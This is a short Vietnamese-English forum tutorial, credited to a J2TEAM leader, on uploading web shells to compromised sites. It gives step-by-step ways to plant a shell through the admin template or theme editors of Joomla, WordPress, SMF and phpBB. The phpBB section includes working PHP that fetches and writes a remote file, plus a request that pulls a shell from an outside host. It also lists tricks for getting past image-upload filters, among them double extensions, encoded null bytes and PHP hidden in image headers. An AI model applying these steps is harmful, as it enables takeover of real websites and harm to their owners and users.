Kỹ thuật upshell cho Newbie
Kỹ thuật upshell cho Newbie
Up Shell đối với:
1.Joomla Site:
After Login into admin panel u will find Extensions on 5th No. expand this
click on it > Template Manager > check on any template (like beez,ja_purity)
Now click on Edit (right upper side)
after this click on Edit html
now paste ur shell code and click save...... Done
site.com/templates/template name/index.php
like site.com/templates/rc/index.php
2.Wordpress:
Login into admin panel
expand Appearance then click on editor > u will find style.css
now select 404.php on right side
paste ur shell code and click edit file
u can find shell in site.com/wp-content/themes/theme name u edit/404.php
3.SMF:
Login into adminpanel
u need to download any smf theme in zip format and put ur shell.php in it and save
admin panel > select Themes and Layout > Install a new theme > browse and upload theme thats have our shell.php
after upload shell will find > site.com/Themes/theme name/shell.php
4.phpBB:
login into admin panel > go on styles -> templates -> edit, for Template file choose faq_body.html
At down of:
PHP Code:
<!-- INCLUDE overall_header.html -->
We add:
[PHP]<!-- PHP -->
fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i]));
<!-- ENDPHP -->
And save it.
Now go on:
http://www.site.com/forum/faq.php?o=....com/shell.txt
Shell find in site path/shell.php
5.Up shell qua bug up ảnh:
Nếu cho upload mỗi file image (bmp, gif, jpg, jpeg) thì sao ?
+ Thử thay đuôi cá xem : shell.php.jpg
+ Thử chơi NULL byte: shell.php.jpg
+ Thử mấy HEX byte chơi trội: shell.php%25%30%30.jpg
+ Thử mấy Unicode Byte shell.phpU+0025U+0030.jpg
+ Kiếm một file ảnh JPG, nhét nguyên code con shell vào trong comment của photo
+ Chèn code shell vào header của photo
GIF89a
<?php //code shell ?>
P/s: Chúc Newbie thành công.
Nguồn: Sưu Tầm
Leader at J2TEAM. Website: https://j2team.dev/